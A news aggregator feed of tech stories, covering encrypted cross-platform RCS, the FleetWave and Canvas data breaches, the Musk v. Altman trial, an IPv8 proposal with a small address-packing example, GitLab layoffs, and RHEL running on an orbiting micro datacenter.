news aggregator
Apple, Google drag cross-platform texting into the encrypted age
Apple and Google have taken a big step toward securing cross-platform texting, ending years of messages bouncing around in glorified plaintext. Apple announced this week that encrypted Rich Communication Services (RCS) messaging is rolling out in beta for iPhone users running iOS 26.5 and Android users on the latest version of Google Messages. The feature works across supported carriers and adds end-to-end encryption to cross-platform chats that were still taking the scenic route through carrier-era messaging infrastructure. Users will know it's enabled when a lock icon appears in RCS conversations. Apple says E2EE RCS messages cannot be read while traveling between devices, bringing Android-to-iPhone chats closer to the protections offered by WhatsApp and Signal. The move lands as other platforms head in the opposite direction. Earlier this month, Meta confirmed it was backing away from parts of its encryption rollout for Instagram DMs, telling The Register that "very few" people actually used the feature and suggesting privacy-minded users head over to WhatsApp instead. Apple, meanwhile, appears content to lean harder into the privacy angle, finally plugging one of the more obvious holes in modern messaging security. That gap has been hanging around for years. While iMessage chats between Apple devices were already encrypted, conversations involving Android phones could fall back to SMS or unencrypted RCS, depending on carrier support. Google had offered encrypted RCS chats inside Google Messages for years, but only when both sides used Google's ecosystem. Apple joining the party means cross-platform RCS encryption is finally starting to span the two largest mobile ecosystems. The rollout is still marked as beta, and carrier support varies by region, so not everyone will get encrypted chats immediately. UK availability remains unclear for now, as none of the major UK networks currently appear on Apple's published compatibility lists for the feature. 
Still, after two decades of the mobile industry insisting that interoperability and security could not coexist, cross-platform texting may finally be catching up with the rest of modern messaging. ®
Categories: Linux fréttir
ZTE and Claro launch next-generation 4K Ultra HD IP STB in Brazil
Partner Content ZTE Corporation and Claro have introduced a new-generation 4K Ultra HD IP set-top box (STB) in Brazil – bringing together stunning Ultra HD visuals, intelligent voice control, fast connectivity, and rich content in one seamless experience. Against the backdrop of the sustained rapid development of Brazil's digital TV and streaming media business, user requirements for video quality, interactive experience, and network performance continue to rise. ZTE, together with Claro, officially launched the new-generation 4K Ultra HD IP STB Z4KW6, bringing “Ultra HD + Intelligent Voice + High-Speed Connectivity + Massive Content” comprehensively to Brazilian households and driving a further upgrade of the digital entertainment experience. Built for the next era of digital TV and streaming, it delivers sharper picture quality and effortless hands-free interaction with far-field voice, making everything feel faster, smoother, and more intuitive. With enhanced connectivity, streaming stays smooth – even in peak usage hours of multi-device homes. And with a rich content ecosystem, all entertainment comes together in one place. Designed for simplicity and built for performance, the Z4KW6 sets a new benchmark for home entertainment. This launch marks a new step forward for home entertainment in Brazil – smarter, faster, and more immersive than ever.
FleetWave outage takes another turn. Chevin confirms crooks accessed customer data
A month after Chevin Fleet Solutions declared its FleetWave outage contained and systems restored, the company has now admitted that attackers accessed customer databases and potentially acquired operational and personal data. Chevin confirmed the breach in an email to customers, seen by The Register, marking the first time it has acknowledged that data was accessed during the April incident that knocked parts of its web-based software offline across the UK and US. At the time, Chevin said it had pulled parts of its Azure-hosted FleetWave tool offline while outside cybersecurity specialists investigated. Status pages showed a "major outage" across the UK and US, but beyond that, customers got little detail on what had happened or whether any data had been caught up in it. Now it turns out that at least some customer databases were indeed affected by the breach. According to the email, Chevin’s forensic investigation determined that an "unauthorized third-party accessed and potentially acquired certain data" from customer databases backed up on April 3, 2026. The exposed information varies depending on how customers configured FleetWave, but includes operational fleet management data alongside personal information such as names, contact details, and payroll numbers. It’s unclear how many individuals and organizations have been affected. The Register asked for comment, and a spokesperson told us: "Chevin recently experienced a cybersecurity incident affecting certain systems. We immediately took steps to contain the incident, engaged with law enforcement and external cybersecurity experts, and have since restored impacted services. "Following consultation with external cybersecurity forensic experts, we are confident our systems have been secured. Our customers are our top priority, and we are working directly with those impacted."
The company insists that the stolen information does not generally include any of the higher-risk categories under GDPR, such as financial information, payment card details, passport data, or special category data. Chevin also claims in its email to customers that it has taken steps to stop the information from being "published, sold, or misused," and says ongoing dark web monitoring has not identified evidence of the data circulating online. One Chevin customer told The Register their organization was unlikely to have been the intended ransomware target due to its size, suggesting the breach may have been aimed elsewhere. The customer also questioned why Chevin appeared confident enough to restore systems and close out forensic work before later returning with confirmation that data had in fact been accessed. The customer said the mention of payroll numbers came as a surprise because their company does not use FleetWave for payroll data, raising questions about how tailored the notification really was. Chevin is now offering affected customers a one-time download of their SQL database and a spreadsheet summarizing potentially exposed records through a secure portal. In the email, signed by CEO Gary Thompson, Chevin says it is "confident that the incident has been contained" and FleetWave systems are now "safe and secure for customers." ®
Britain pays Starlink millions despite Musk's calls to overthrow UK government
Britain's Ministry of Defence (MoD) has clocked up a £16.6 million ($22.6 million) bill with Starlink over the past four years, despite SpaceX CEO Elon Musk expressing a desire to overthrow the UK government. Data released by the MoD shows that Britain has continued to pay for access to the spaceborne data network, primarily to help support the Ukrainian military in its ongoing battle against the Russian invasion. Not all of the expenditure is accounted for by Ukraine, however. Some goes toward providing British military personnel serving overseas with a vital link home. According to Business Matters, upward of 50,000 Starlink terminals have been sent to Ukraine since the start of the war in 2022. Initially, the cost of helping that nation's frontline communications was borne by Starlink itself, with some grumbling from Musk, who controls the company's parent business, SpaceX. However, a year later the satellite operator clinched an official US government contract covering the Starlink service for Ukraine, which we understand is still funded by the Department of Defense (DoD), although President Trump has not sought congressional approval for any new funding for US military assistance to Ukraine since returning to office. The UK appears to be footing part of the Starlink bill. The MoD acknowledged the figure, with some spending understood to cover terminals gifted to Ukraine, including their purchase and airtime. However, the MoD seems keen to emphasize that Starlink is not being used for any kind of military purposes by British forces. "Starlink technology is not used for military operations and is primarily used by our hardworking personnel to stay connected with their loved ones when they're in areas without regular internet access, for example on a warship," a spokesperson told The Register. 
"As the public would rightly expect, all spending is rigorously checked to ensure it delivers value for taxpayers' money and spend on Starlink has significantly reduced in the last year." Ukraine uses Starlink for battlefield communications and remote control of drones. The sum is modest in relation to the entire UK defense budget, on track to hit £62.2 billion ($85 billion) for FY 2025/26. It is also likely just covering a small part of the Ukrainian service costs, as Starlink was asking for $400 million per year to cover these at one point. Some Brits may feel uncomfortable paying a man who has openly called for the overthrow of the British government. Earlier this year, Musk publicly mused whether the US should "liberate the people of Britain from their tyrannical government." No, it wasn't on April 1. ®
Microsoft CEO Satya Nadella Testifies In OpenAI Trial
The Musk v. Altman trial entered its third week Monday, with Microsoft CEO Satya Nadella and former OpenAI co-founder and renowned AI researcher Ilya Sutskever taking the stand. Nadella testified that Elon Musk never raised concerns to him that Microsoft's investments in OpenAI violated any special commitments, and said he viewed the partnership as clearly commercial from the start. He also described OpenAI's 2023 board crisis as "amateur city."
Meanwhile, Sutskever testified that he had raised concerns about Sam Altman because he feared OpenAI could be "destroyed." He expressed concerns about Altman's behavior to the board, in part because he said he felt "a great deal of ownership" over the startup. "I simply cared for it, and I didn't want it to be destroyed," Sutskever said. CNBC reports: Nadella said he was "very proud" that Microsoft took the risk to invest in OpenAI when "no one else was willing" to bet on the fledgling lab. Musk, who testified late last month, said Microsoft's $10 billion investment was the key tipping point that made him believe OpenAI was violating its nonprofit mission. He testified that the scale of the investment bothered him, and it prompted him to open a legal investigation into OpenAI. "I was concerned they were really trying to steal the charity," Musk said from the stand.
Nadella said he did not believe Microsoft's investments in OpenAI were donations, and that there was a clear commercial element to their partnership from the outset. He said during the partnership's early years, Microsoft gave OpenAI sharp discounts on computing resources, and Microsoft believed it would reap marketing benefits from doing so. During a separate video deposition that was played on Monday morning, Michael Wetter, a corporate development executive at Microsoft, said the company has recognized approximately $9.5 billion in revenue to date through its partnership with OpenAI as of March 2025.
[...] Nadella said he was "pretty surprised" by the board's decision [to fire Altman in November 2023], and that his priority was to try to figure out how to maintain continuity for Microsoft customers. Immediately after Altman was removed, Nadella said he made an effort to learn more about what happened, adding that he suspected jealousy and poor communication were at play. During conversations with OpenAI board members after the firing, Nadella said he was simply trying to understand the language in OpenAI's statement about Altman being "not consistently candid" while communicating with the board. That language, Nadella said, "just didn't sort of suffice, because this is the CEO of a company that we are invested in and we're deeply partnered with, and so I felt that they could have explained to me what are the incidents or what is the detail behind it." There must have been instances of jealousy or miscommunication that could have justified pushing out Altman, Nadella reasoned. He wanted more depth from the board members after the remark about candor, but no such information was available, he said. "It was sort of amateur city, as far as I'm concerned," Nadella testified.
[...] Musk testified that he is not entirely against OpenAI having a for-profit unit, but he said it became "the tail wagging the dog." He repeatedly accused Altman and Brockman of enriching themselves from a charity while also reaping the positive associations that come from running a nonprofit. "Microsoft has their own motivations, and that would be different from the motivations of the charity," Musk said from the stand. "All due respect to Microsoft, do you really want Microsoft controlling digital superintelligence?"
During a videotaped deposition shown in court last week, former OpenAI director Tasha McCauley recalled a discussion with Nadella and her fellow board members after the 2023 decision to dismiss Altman as OpenAI's CEO. "To the best of my recollection, Satya wanted to restore things to as they had been," McCauley said. The board members didn't think that was the right move, she said. But as a court witness on Monday, Nadella said he never demanded that the board reinstate Altman as OpenAI CEO. Recap:
Sam Altman Had a Bad Day In Court (Day Eight)
Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven)
Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six)
OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five)
Musk Concludes Testimony At OpenAI Trial (Day Four)
Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three)
Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two)
Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One)
Read more of this story at Slashdot.
Japan’s PM orders cybersecurity review to stop Mythos going full CyberZilla
Japan’s prime minister Sanae Takaichi has ordered a review of government cybersecurity strategy, citing the arrival of Anthropic’s bug-hunting model Mythos as a development that warrants a cabinet-level response. In a Tuesday cabinet meeting, the PM instructed cybersecurity minister Hisashi Matsumoto to devise measures to check the state of government systems to determine whether it’s possible to detect and fix vulnerabilities, and to develop a plan to ensure critical infrastructure operators can do likewise. Japan’s leader ordered the checks because she feels Mythos and similar frontier models may be misused, and that attacks on infrastructure may therefore increase in speed and scale – perhaps even exponentially. Over the last couple of years cybersecurity vendors and researchers have often pointed out that AI models make it possible to find flaws and automate attacks. When Anthropic debuted Mythos in early April, the notion that AI has the potential to vastly complicate the security landscape went mainstream. Many regulators around the world have issued guidance pointing out that now is the perfect time to revisit and improve security strategies and capabilities, because Mythos and other AI models mean defenses are going to be tested like never before. India’s securities regulator went a step further by ordering a security review at the organizations it oversees. And now Japan’s leader has decided the matter is of sufficient importance that her office needs to weigh in and set new policy to ensure AI doesn’t go on a destructive rampage through Japanese infrastructure. Whether Takaichi’s urgency is needed is open to debate. Some researchers have said that while Mythos can find bugs at speed, it doesn’t find flaws humans can’t detect with their naked brains. Others suggest Mythos is not vastly better at finding bugs than open source models that pre-date it and are publicly available – unlike Mythos, which is restricted to certain users.
Others have all but dismissed Mythos as a marketing stunt. ®
Veteran network architect proposes IPv8 – to improve IPv4, not leapfrog v6
A veteran network architect named James Thain has drafted a proposal for “Internet Protocol Version 8” (IPv8) and hopes to crowdfund work to create a testbed that will demonstrate his ideas. Thain’s proposal appeared as an Internet Engineering Task Force (IETF) Internet-Draft on April 16th. Like all such documents, it has no official standing – the multistakeholder systems under which the internet is governed allow open participation, and this is Thain’s contribution. The draft opens with a bold vision for IPv8, describing it as “a managed network protocol suite that transforms how networks of every scale – from home networks to the global internet – are operated, secured, and monitored.” On the IPv8 website he describes it as “a managed network protocol suite that resolves IPv4 exhaustion, unifies network management, and stays 100 percent backward compatible — no flag day, no forced migration.” IPv4, the draft states, is “a proper subset of IPv8. An IPv8 address with the routing prefix field set to zero is an IPv4 address. No existing device, application, or network requires modification.” In conversation with The Register, Thain said he created the IPv8 draft because existing protocols were developed for the networking problems of the day, and things have now well and truly moved on. He also thinks that few organizations other than hyperscalers and network operators have a good reason to adopt IPv6, because it doesn’t offer major improvements over IPv4 and migrations to the newer protocol seldom produce return on investment. He allows that IPv4 exhaustion means many organizations and network operators do need to consider IPv6, but feels the best course of action is to improve IPv4 so users get a better protocol without the need for upgrades.
One improvement in IPv8 expands the IPv4 numberspace by adding what he calls an “area code” based on a network operator's autonomous system number (ASN), the unique identifiers assigned to networks by regional internet registries. ASNs effectively function as addresses for a network, to inform routing decisions. IPv8 proposes an address format r.r.r.r.n.n.n.n where the “r” is the ASN encoded as a 32-bit integer and the “n” is a conventional IPv4 address. This scheme means every ASN holder gets 2³² host addresses – 4,294,967,296 addresses apiece. Thain thinks that will suffice for almost every organization, and those who need more probably already operate multiple ASNs. His scheme would see the IPv4 numberspace expand to around 30 trillion (3 × 10¹³) unique addresses. That’s well short of the 340 undecillion (3.4 × 10³⁸) addresses available under IPv6, but Thain thinks it’s still enough and that users will appreciate not having to migrate away from IPv4. “It doesn’t require a ton of changes to Border Gateway Protocol, which already knows how to route multiple protocols,” Thain told us. “So does MPLS.” IPv8 therefore “gives you a roll forward of IPv4, you just need servers to translate the ‘area codes’. The rest of the stack is all well-known,” Thain said. “There is no magic here, it is just an area code plus IPv4.” Another IPv8 feature is what Thain calls a “Zone server” that his draft explains “runs every service a network segment requires: address assignment (DHCP8), name resolution (DNS8), time synchronisation (NTP8), telemetry collection (NetLog8), authentication caching (OAuth8), route validation (WHOIS8 resolver), access control enforcement (ACL8), and IPv4/IPv8 translation (XLATE8).” IPv8 has caused a stir in internetworking circles, and some at times bitter criticism. Others have been more nuanced.
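To make the “area code” scheme concrete, here is a minimal sketch of how such addresses might be packed and unpacked, assuming a straight concatenation of a 32-bit ASN with a 32-bit IPv4 address rendered in the draft's dotted r.r.r.r.n.n.n.n notation – the draft's actual wire format and encoding rules may well differ:

```python
import ipaddress

def to_ipv8(asn: int, ipv4: str) -> str:
    """Render an ASN 'area code' plus an IPv4 address in dotted
    r.r.r.r.n.n.n.n notation (illustrative only)."""
    if not 0 <= asn < 2**32:
        raise ValueError("ASN must fit in 32 bits")
    r = ipaddress.IPv4Address(asn)   # reuse dotted-quad rendering for the ASN
    n = ipaddress.IPv4Address(ipv4)
    return f"{r}.{n}"

def from_ipv8(addr: str) -> tuple[int, str]:
    """Split an r.r.r.r.n.n.n.n address back into (ASN, IPv4)."""
    parts = addr.split(".")
    if len(parts) != 8:
        raise ValueError("expected eight dotted octets")
    r, n = ".".join(parts[:4]), ".".join(parts[4:])
    return int(ipaddress.IPv4Address(r)), n

# Per the draft, an address with the routing prefix (ASN) set to zero
# is a plain IPv4 address - that is how IPv4 stays a proper subset.
print(to_ipv8(0, "192.0.2.1"))      # 0.0.0.0.192.0.2.1
print(to_ipv8(64512, "192.0.2.1"))  # 0.0.252.0.192.0.2.1 (ASN 64512 is a private ASN)
```

The helper names (`to_ipv8`, `from_ipv8`) are ours, not the draft's; the point is only that the translation is a trivial 64-bit concatenation, which is why Thain argues BGP and MPLS need little modification to carry it.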
Silvan Gephart of ISP Openfactory blogged about the draft and said “I like that there is a proposal thinking about the routing table, addressing, management, authentication and operational complexity as one bigger problem.” Some of the criticism levelled at the protocol suggests it’s the work of AI. Thain doesn’t shy away from having used chatbots to work on his draft and told The Register he feels doing so is contemporary practice. He thinks he can prove the nay-sayers wrong by building an IPv8 testbed and has commenced a crowdfunding campaign that aims to raise $100,000 to cover the cost of developing open-source software, research and testing infrastructure, plus demos and documentation. You can find the crowdfunding project here. ®
A Data Center Drained 30 Million Gallons of Water Unnoticed
A Georgia data center developed by QTS used nearly 30 million gallons of water through two unaccounted-for connections before residents complained about low water pressure and the county utility discovered the issue. "All told, the developer, Quality Technology Services, owed nearly $150,000 for using more than 29 million gallons of unaccounted-for water," reports Politico. "That is equivalent to 44 Olympic-size swimming pools and far exceeds the peak limit agreed to during the data center planning process." From the report: The details were revealed in a May 15, 2025 letter from the Fayette County water system to Quality Technology Services, which outlined the retroactive charge of $147,474. The letter did not specify how many months the unpaid bill covered, but when asked about it Wednesday, Vanessa Tigert, the Fayette County water system director, said it was likely about four months. A QTS spokesperson said the timeframe was 9-15 months. Once the data center was notified, it paid all retroactive charges, a QTS spokesperson said in an email, noting the unmetered water consumption occurred while the county converted its system to smart meters.
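As a quick sanity check on the figures above (assuming the commonly cited volume of roughly 660,000 US gallons for an Olympic-size pool, a number not stated in the report):

```python
# Back-of-envelope check on the reported QTS water figures.
gallons_used = 29_000_000   # "more than 29 million gallons"
pool_gallons = 660_000      # assumed Olympic-size pool volume (~2,500 m^3)
retro_charge = 147_474      # retroactive bill in USD

pools = gallons_used / pool_gallons
rate_per_kgal = retro_charge / (gallons_used / 1_000)

print(f"{pools:.0f} Olympic pools")           # 44 Olympic pools
print(f"${rate_per_kgal:.2f} per 1,000 gal")  # $5.09 per 1,000 gal
```

The pool count matches Politico's "44 Olympic-size swimming pools," and the implied rate of about $5 per thousand gallons reflects the higher construction rate the county says it applied.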
The Fayette County water system confirmed the data center's meters are now fully integrated and tracked. Tigert, the water system director, blamed the issue on a procedural mix-up. "Fayette County is a suburb, it's mostly residential, and we don't have much commercial meters in our system anyway," she said. "And so we didn't realize our connection point wasn't working." The incident became public last week when a county resident obtained the 2025 letter to QTS through a public records request and posted it on Facebook, prompting outrage from residents concerned about the data center's water consumption. [...]
Tigert, who sent the 2025 letter to QTS, said the utility didn't know about the water hookups because the connection process "got mixed up" as the county transitioned to a cloud-based system while also trying to accommodate an industrial customer. Tigert also said her staff is small and at capacity. "Just like any water system, we don't have enough staff. We can't keep staff," she said. "I've got one person that's doing inspections and plan review, and so he's spread pretty thin." She said it's possible her staff did know about hookups but that she hadn't been able to locate the inspection report. "I may have hit 'send' too soon," she said about the 2025 letter to QTS. While the utility charged the data center a higher construction rate for the unapproved water consumption, Tigert confirmed the utility did not penalize or fine the data center.
For what it's worth, the Blackstone-owned company says its data centers use a closed-loop cooling system that does not consume water for cooling. The reason for last year's high water use, according to QTS, was the temporary construction work such as concrete, dust control, and site preparation.
Once the campus is fully operational, it should only use a small amount of water for things like bathrooms and kitchens. But that point could still be years away, as construction and expansion in Fayetteville may continue for another three to five years.
Read more of this story at Slashdot.
GitLab promises a different kind of layoff as biz pivots toward AI
GitLab has opened the voluntary separation window and hopes an unspecified number of employees will exit the business to help it become "the trusted enterprise platform for software creation in the AI era." According to CEO Bill Staples, the company's effort to trim its workforce differs from other AI-related layoffs. "This restructure process is not like others you may be seeing in the news," wrote Staples in a blog post. "Of course AI is changing the way we work and is part of our transformation plan, but this is not an AI optimization or cost cutting exercise." What is it then? Well, according to Staples, GitLab plans to use most of the money it saves by sacking staff to invest in its business. We note that the five fundamental architectural bets at the heart of this business reorientation – agent-specific APIs; reworked CI/CD; a data model for surfacing context; governance; and support for human-owned, agent-assisted, and autonomous workloads – sound like infrastructure investments, the very thing other companies fuel with vacated payroll obligations. But GitLab isn't (so far as we can tell) returning freed funds to investors, initiating a stock buyback, larding executive bonuses, or launching an ill-advised metaverse venture that will consume $80 billion over five years. So maybe that's the difference to which Staples alluded. The other difference Staples cited is his company's plan to have managers chat with employees about staying or going. "Starting today, managers across the company are entering deeper conversations with leadership about how the restructuring principles land inside their teams," he said. "Those conversations will inform the decision of impacted roles." There's no word on the rubric for these retention-or-departure chats. Presumably employees deemed insufficiently enthused about the new direction will be encouraged to exit through the voluntary separation window.
Absent that cooperation, defenestration at the hands of managers will likely follow. While Staples has not provided a target for the number of desired layoffs – details will be revealed during the company's Q1 FY2027 financial report on June 2nd – he did set a territory footprint goal. "We're reevaluating our operational footprint, and are planning to reduce the number of countries by up to 30 percent where we have small teams," he said. GitLab currently operates in 60 countries. That's a lot of different corporate entities to run, tax laws to master, and offices to rent. The code biz did not immediately respond to a request to clarify how "small teams" is defined. Nor does it disclose its headcount in recent annual reports. According to analytics biz Unify, GitLab has about 1,800 employees, of whom almost 1,500 work outside the US. Another goal of the layoff plan is to reduce GitLab's organizational layers. "We’re flattening our organization because eight layers is too deep for a company our size and management layers are slowing us down," said Staples. GitLab is betting heavily on its Duo Agent Platform (DAP), which entered general availability in January. As recently as its 2025 annual report [PDF], GitLab talked up the possibility of continued hiring. "We intend to grow our international revenue by strategically increasing our investments in international sales and marketing operations, including headcount in the EMEA and APAC regions," the biz said during a more optimistic time. Now, not so much. Beyond other challenges like soft government business, one reason for the AI remake appears to be the company's decision to raise prices back in 2023. In March, during GitLab's Q4 FY2026 [PDF] conference call for investors, Staples admitted that price-sensitive organizations didn't much appreciate having to pay more. "Our 50 percent Premium price increase a few years ago also coincided with rising AI code experimentation and flattish SaaS budgets," he said.
"Simultaneously, our upmarket shift reduced technical resources at the lower end of the market. Together, these have slowed Premium growth, particularly among price-sensitive customers which we estimate at roughly 20 percent of our ARR, including the SMB weakness that we have been discussing recently." ®
Red Hat blasts RHEL 10.1 into orbit aboard Voyager's micro datacenter
Red Hat Enterprise Linux 10.1 has powered up on board a datacenter orbiting 250 miles, or about 400 km, above the Earth. That RHEL-powered satellite is Voyager’s LEOcloud Space Edge “micro” datacenter, which launched aboard a SpaceX Falcon 9 rocket and hitched a ride to the International Space Station (ISS) back in September. The system is designed to demonstrate the advantages of processing data gathered directly in orbit, rather than sending info back to a conventional terrestrial datacenter. Voyager boasts that the reduction in latency makes the system as much as 30x faster than sending all the data back to Earth. Originally developed by LEOcloud prior to its acquisition by Voyager last year, Space Edge is, as its name suggests, a low-power edge compute platform for orbital data processing. Voyager and Red Hat contend that “as commercial and government organizations increase their reliance on space-based data, the ability to process data in orbit is increasingly critical.” And they certainly wouldn’t be the first to suggest that. Faced with power constraints, SpaceX, Amazon, Google, Nvidia and others have all announced plans to put large clusters of AI datacenters in orbit, with some designs aiming to cram 100kW worth of compute onboard a single satellite. The company hasn’t disclosed the hardware used in Voyager’s Space Edge, stating only that it’s a “space-hardened managed cloud infrastructure.” Hardening is certainly a concern for complex electronics operating outside Earth’s atmosphere, where charged particles and radiation can corrupt data or do permanent damage over time. HPE’s Spaceborne compute platform demonstrated many of these challenges during its first mission aboard the ISS in 2017. Over the course of its mission the system, which was composed of mostly off-the-shelf components, suffered several upsets including a power failure and SSDs that failed at an “alarming rate,” HPE's Mark Fernandez said at the time.
We’ve reached out to Voyager for comment on the system and what kind of data its “micro” datacenter will process during its mission. We’ll let you know if we hear anything back. It’s safe to assume Space Edge’s compute capacity is limited, as promotional images show its systems are little larger than a shoebox – and therefore offer less room for components than servers used on Earth. What we do know is that RHEL 10.1, along with Red Hat’s Universal Base Image (UBI), are up and running on the ISS. Specifically, Space Edge is running RHEL in image mode, an immutable build of the OS in which changes to most directories will reset to a known good state upon reboot. This means that any issues related to what Red Hat calls "configuration drift" can be addressed by turning the machine off and back on again, a feature we’re sure will be popular among many in the IT crowd. Alongside the base OS, Space Edge is also running Red Hat’s UBI container image under Podman, a Docker-like container engine that is rootless and daemonless by default. RHEL 10.1’s arrival in orbit comes amid renewed interest in space driven by the yearning of every great hyperscaler to boldly go and generate tokens where no one has before. Actually, they have, but not at scale. But that’s exactly what SpaceX, Amazon and others have proposed. In pursuit of unlimited power, the two companies have independently filed to put large constellations of AI satellite compute platforms in sun-synchronous orbit. In February, SpaceX filed an application with the Federal Communications Commission to lob a million space-based datacenters into orbit. Meanwhile, Amazon has proposed a slightly smaller constellation with 51,600 data processing satellites. Of course, these plans do have one small problem left to solve. How will they get those sats into orbit for less than the cost of simply building more terrestrial infrastructure?
According to one space datacenter startup, the economics of orbital datacenters won’t be viable until the cost to orbit falls to around $10 per kilogram. As of writing, a rideshare aboard a Falcon 9 runs about $7,000 a kilogram. ®
Categories: Linux fréttir
Securing the Untrusted Agentic Development Layer
Join us to learn how to architect a development environment where your builders and their agents can move fast and securely.
Categories: Linux fréttir
Quit VMware and you’ll emerge with more complex and less capable infrastructure
Organizations that decide to reduce their VMware footprints, or quit Virtzilla entirely, will emerge with more complex and less capable infrastructure. That’s the view of Paul Delory, a research vice president with analyst firm Gartner, who yesterday told the company’s IT Infrastructure, Operations & Cloud Strategies Conference in Sydney that there is no technical reason for VMware users to adopt a rival hypervisor, and that no vendor offers a one-for-one replacement for the virtualization pioneer’s flagship Cloud Foundation (VCF) suite. But Delory said Broadcom’s licensing policies, which see it sell only VCF, mean VMware users’ licensing bills typically rise by 300 to 400 percent. Broadcom argues that the full-stack private clouds VCF enables are so efficient that the suite quickly pays for itself. The analyst told the conference he thinks those contemplating a move off VMware will do better if they instead focus on application modernization. But he said Broadcom’s price changes, and the prospect the company might hike prices again in future, mean many VMware users will look elsewhere. Those who do, he warned, will end up with more complex infrastructure for two reasons. One is that few organizations will be able to quit VMware entirely, as they run applications with dependencies that aren’t easy or economical to unwind. Reducing or eliminating a VMware rig therefore means adopting multiple replacements, which creates more infrastructure to manage and therefore extra complexity. The other is that no rival hypervisor can match the efficiency or VM density possible when using VMware’s products, so moving means acquiring more hardware. Delory said the best alternatives to VMware are the public cloud, or HCI vendors – these days that acronym denotes both hyperconverged infrastructure and hybrid cloud infrastructure. 
The analyst warned that HCI vendors, with the exception of Nutanix, have weak migration tools that will leave users needing to create bespoke migration automations using “Ansible and a Rube Goldberg machine.” Public clouds, he said, will welcome customers who move 1,000 or more VMs with free migration services. He recommended against considering OpenStack, which he said remains “too big, too complex, and has too many moving parts for the typical IT shop to handle effectively.” Delory also warned VMware users that migration projects are significant engineering undertakings that require extensive assessment of every application in a fleet to determine its best destination, and the work required to get it there. He reminded VMware users that not every workload is certified to run under non-VMware hypervisors, and that some vendors now offer cloud-native versions of their wares, providing an easier on-ramp to containerised applications. Delory advised exploring those options, and not making architectural decisions that mean you can’t consider moving off VMware. “VMware is betting that you can’t move off and they can jack the price way up,” he said. “That may be a good bet. But don’t make it easy.” The analyst finished his talk by predicting most users will minimize their VMware footprints, rather than eliminating them, and restated Gartner’s prediction that 35 percent of workloads currently running under VMware will operate on a different platform by 2028. ®
Categories: Linux fréttir
Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and, for many, Advanced Placement testing. As of Saturday, the company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters then defaced about 330 Canvas school login portals by exploiting the same Free-for-Teacher vulnerability, prompting the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools, among them Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. 
After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: Linux fréttir
Digg Tries Again, This Time As an AI News Aggregator
Digg is relaunching again, this time as an AI-focused news aggregator rather than the Reddit-style community site it recently abandoned. TechCrunch reports: On Friday evening, the founder previewed a link to the newly redesigned Digg, which now looks nothing like a Reddit clone and more like the news aggregator it once was. This time around, the site is focused on ranking news -- specifically, AI news to start. In an email to beta testers, the company said the site's goal is to "track the most influential voices in a space" and to surface the news that's actually worth "paying attention to." AI is the area it's testing this idea with, but if successful, Digg will expand to include other topics. The email warned that the site was still raw and "buggy," and was designed more to give users a first look than to serve as its public debut.
On the current homepage, Digg showcases four main stories at the top: the most viewed story, a story seeing rising discussion, the fastest-climbing story, and one "In case you missed it" headline. Below that is a ranked list of top stories for the day, complete with engagement metrics like views, comments, likes, and saves. But the twist is that these metrics aren't the ones generated on Digg itself. Instead, Digg is ingesting content from X in real-time to determine what's being discussed, while also performing sentiment analysis, clustering, and signal detection to determine what matters most. [...] The site also ranks the top 1,000 people involved in AI, as well as the top companies and the top politicians focused on AI issues.
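Digg hasn't published how its rankings are actually computed, but the engagement-weighted ordering described above can be sketched in a few lines. The stories, field names, and weights below are all invented for illustration; they simply show how weighting deeper engagement (comments, saves) above raw views reorders a feed:

```python
# Hypothetical engagement-based ranking sketch; data and weights are invented.
stories = [
    {"title": "Model X released", "views": 12000, "comments": 340, "likes": 900, "saves": 120},
    {"title": "Chip shortage easing", "views": 8000, "comments": 90, "likes": 300, "saves": 40},
    {"title": "Agents in production", "views": 5000, "comments": 700, "likes": 250, "saves": 300},
]

def score(story):
    # Deeper engagement signals get heavier weights than passive views.
    return (story["views"] * 0.001 + story["comments"] * 2
            + story["likes"] * 0.5 + story["saves"] * 3)

ranked = sorted(stories, key=score, reverse=True)
# The most-viewed story is not necessarily the top-ranked one.
assert ranked[0]["title"] == "Agents in production"
```

A real system layered on X firehose data would add the sentiment analysis, clustering, and signal detection the article mentions on top of a scoring pass like this.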
Read more of this story at Slashdot.
Categories: Linux fréttir
CUDA Proves Nvidia Is a Software Company
